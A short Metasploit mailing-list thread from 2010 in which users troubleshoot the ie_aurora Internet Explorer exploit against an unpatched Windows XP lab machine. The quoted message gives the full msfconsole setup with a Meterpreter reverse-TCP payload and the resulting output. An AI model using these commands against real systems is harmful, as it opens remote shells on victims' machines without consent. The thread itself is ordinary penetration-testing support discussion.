Re: ie_aurora exploit problem.

[". ." <n0s0yn4die () gmail com>]

Same here.

I have to reboot my XP box every time I want to exploit it sucessfull...


2010/1/19 Abhijeet Hatekar <abhi.hatekar () gmail com>:
> Hello,
>
> I am trying to exploit unpatched windows XP box using ie_aurora exploit. I
> succeeded in my first attempt but not able to exploit that box again.
> I am using meterpreter as payload with following settings.
>
> msf exploit(ie_aurora) > set SRVHOST 192.168.146.131
> SRVHOST => 192.168.146.131
> msf exploit(ie_aurora) > set SRVPORT 80
> SRVPORT => 80
> msf exploit(ie_aurora) > set URIPATH /
> URIPATH => /
> msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
> PAYLOAD => windows/meterpreter/reverse_tcp
> msf exploit(ie_aurora) > set LHOST 172.16.146.131
> LHOST => 172.16.146.131
> msf exploit(ie_aurora) > exploit
> [*] Exploit running as background job.
> msf exploit(ie_aurora) >
> [*] Started reverse handler on port 4444
> [*] Using URL: http://192.168.146.131:80/
> [*] Server started.
> [*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client
> 192.168.146.132
>
> I can see Internet explorer making following 3 HTTP requests and receiving
> 200 OK for all of them.
> GET / HTTP/1.1
> GET /7rOXg9u3T8KultrvNVLds.gif HTTP/1.1
> GET /favicon.ico HTTP/1.1
>
> My internet explorer goes unresponsive and crashes but I dont get reverse
> shell anymore :(
> Target system has no access to internet and is not patched.
> Please let me whats going wrong.
>
>
> --
> Thanks and Regards,
> Abhie
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework